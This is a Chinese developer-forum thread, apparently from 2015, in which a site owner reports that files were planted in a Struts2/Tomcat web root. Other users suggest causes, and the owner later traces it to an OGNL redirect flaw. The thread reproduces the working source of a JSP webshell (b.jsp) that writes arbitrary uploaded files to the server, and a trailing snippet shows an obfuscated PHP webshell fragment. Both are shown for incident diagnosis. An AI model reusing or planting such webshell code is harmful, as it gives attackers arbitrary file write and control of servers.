8.0w+
社区成员
struts2 的网站被人植入木马
一个JAVA WEB应用,CentOS 7 + tomcat / struts2 的网站,在ROOT根目录下莫名其妙多了如下几个文件
0 1.txt
b.jsp
bak.jsp
debug.exe
guige.jsp
IFD说锟斤拷锟斤拷.pdf
Json.dll
lndex.jsp
one.jsp
one8.jsp
wget-log
其中 b.jsp 的文件内容如下(其它的有点长,暂时不帖了):
初步估计是 struts2 的漏洞导致的,但没有任何线索
谁能指导一下方向
谢谢!
0 1.txt
b.jsp
bak.jsp
debug.exe
guige.jsp
IFD说锟斤拷锟斤拷.pdf
Json.dll
lndex.jsp
one.jsp
one8.jsp
wget-log
其中 b.jsp 的文件内容如下(其它的有点长,暂时不帖了):
<%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream is=request.getInputStream();byte[] b=new byte[512];int n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%>初步估计是 struts2 的漏洞导致的,但没有任何线索
谁能指导一下方向
谢谢!
...全文
当前发帖距今超过3年,不再开放新的回复
发表回复
小灰狼 2015-12-18
自己 up 一下
求高人指点
wrong1111 2015-12-18
struts2 很久之前就已经暴露出来了BUG,现在我们已经放弃不使用了,直接使用spring的mvc
小灰狼 2015-12-18
已经找到问题所在了,是 struts2 的重定向漏洞,通过测试已经发现黑客可以通过一个 url 让服务端执行一段指定的OGNL代码,从而植入木马
升级 jar 之后解决
但是,struts2 的这个漏洞好危险啊,我的系统有网上交易的!
小灰狼 2015-12-17
有线索吗
不知道如何查找
u010053498 2015-12-17
没有遇到过。
只是猜测
大概了解下这些文件的大体意图(是人家恶作剧玩笑、做测试、还是带有恶意的获取信息,修改信息)
你在你的网站输入表单部分 或者 其他能够上传至服务器的部分 做好校验 如果可以最好能够捕获 登陆人的账号等信息(可能还会来拜访你的)
然后你只能仔细排查 测试了 网上以前依稀看过。
解决了的话 希望到时候@下分享一下。
比特币暴涨引发挖矿木马成倍增长,企业如何冲破“木马围城”? 而虚拟货币繁荣背后,黑色数字产业链却早已将方向转向“挖矿”领域,挖矿木马仍是企业服务器被攻陷后植入的主要木马类型。 近日,腾讯安全威胁情报中心态势感知系统提供的数据结果显示,针对云主机的挖矿木马样本量...
如何解决服务器挖矿木马 网站服务器如果被挖矿木马团伙攻陷,正常业务服务的性能将遭受严重影响,挖矿木马会被感染,也代表着网站服务器权限被hack攻陷,公司的机密信息可能会泄露,攻击者也可能同时彻底破坏数据。 面临更加严峻的安全...
2019年上半年挖矿木马报告:日均新增6万个木马样本 一、概述 比特币在经历了2018年大幅下跌之后,在2019年上半年又...例如2019年3月初开始出现的“匿影”挖矿木马,自出现之后就不断更新基础设施,利用各大图床、网盘传播恶意挖矿程序;“永恒之蓝”下载器木马、Wan...
Windows 服务器下勒索木马的防护与对抗 黑客利用弱口令和各类系统漏洞,软件漏洞向服务器远程渗透投毒,经常出现一个服务集群多台主机被感染的情况,造成的影响轻则服务中断,有严重的更影响到整个公司的运营,已经成为影响企业安全的一大问题。...
生存还是毁灭?一文读懂挖矿木马的战略战术 前言 比特币等虚拟货币在2019年迎来了久违的大幅上涨,从最低3000美元上涨至7...2019年共监控到58个成规模的挖矿木马团伙(数据截止到8月底),以累积感染量定义木马活跃度,下图/表是活跃TOP10的木马家族及简介...
【应急响应】黑客入侵应急分析手工排查 病毒木马:远控、后门、勒索软件 信息泄漏:刷裤、数据库登录(弱口令) 网络流量:频繁发包、批量请求、DDOS攻击 2. 排查思路 一个常规的入侵事件后的系统排查思路: 1. 文件分析 a) 文件日期、新增文件、...
中高级前端常被问及的 WEB 安全相关面试题总结 等等)那就麻烦了 2、因为之前A网站已经打开了,浏览器存有A下发的Cookie或其他用于身份认证的信息,这一次被“唆使”的请求,将会自动带上这些信息,A网站后端分不清楚这是否是用户真实的意愿 4、DDoS 攻击 DDoS...
常见WEB漏洞原理分析 在设计程序,忽略了对输入字符串中夹带的SQL指令的检查,被数据库误认为是正常的SQL指令而运行,从而使数据库受到攻击,可能导致数据被窃取、更改、删除,以及进一步导致网站被嵌入恶意代码、被植入后门程序等危害。...
常见网站攻击技术,一篇打包全部带走! 等等)那就麻烦了 2、因为之前A网站已经打开了,浏览器存有A下发的Cookie或其他用于身份认证的信息,这一次被“唆使”的请求,将会自动带上这些信息,A网站后端分不清楚这是否是用户真实的意愿 4、DDoS 攻击 DDoS...
Webshell-Part1&Part2 (gzinflate(str_rot13(base64_decode('rUp6Yts2EP68APkPDHhANppV7pZvg3B7zRxsZNvYmeUMA5JAoCTacyORglXF8YL89x0pyS/Ny9KiToDY9/rcw+MdULNZcX5TRpEpxnT1c+N1aodaRH2PVlZIveZ7rucNU8NYKyBfyI1o3XX8Z7+7RrtykqlD5...
【应急基础】————6、命令大全 2、stat命令是干啥的? 显示文件详细信息,访问时间、内容修改时间、状态修改时间 3、lsof的作用是什么? 查看进程打开的文件,打开文件的进程,进程打开的端口(TCP\UDP) 详细内容可参考...
android安卓源码海量项目合集打包-1 │ │ 对于已经被不大好用的Actionbar折磨的开发者来说,Toolbar的出现确实是一个好消息,Toolbar是应用的内容的标准工具栏,可以说是Actionbar的升级版,两者不是独立关系,要使用Toolbar还是得跟ActionBar有关系的...
超30亿条用户数据被窃取 BAT无一幸免 微博莫名其妙关注了乱七八糟的营销号,QQ 号忽然加了一些不认识的好友及群聊,淘宝账号不知何时多了几个好友……如果你遇到过这些问题,说明你的账号密码不幸中招,已经被他人非法窃取。 近日,绍兴警方破获了...
游戏安全资讯精选 2017年 第八期:从“马甲”到“刷金”,盘点网络游戏的攻击和欺诈,微软“9月周二补丁日”发布81个漏洞补丁,系统优化工具CCleaner被植入后门... 2017年9月18日,Piriform官方发布安全公告,公告称旗下的CCleaner version 5.33.6162和CCleaner Cloud version 1.07.3191中的32位应用程序被篡改并植入了恶意代码。 点评: 由于整个恶意代码盗用了CCleaner的...
服务器被黑善后工作 最后一个步骤就是打开软件管理,把一些常用的软件升级安装或者覆盖安装一次,比如Winrar,这个是最容易被植入免杀木马的,解压一次挂一次,压缩一次挂一次。 后期彻底清理 前面是快速简单的清理,后面...
进行渗透测试的详细检测方法 越来越多的网站以及app手机端客户注重安全渗透测试服务,上线前必须要对平台进行全面的预渗透测试找出安全漏洞以及BUG,很多客户找我们SINE安全,做渗透测试服务的时候对具体的流程可能不太了解,下面我们把具体的渗透...
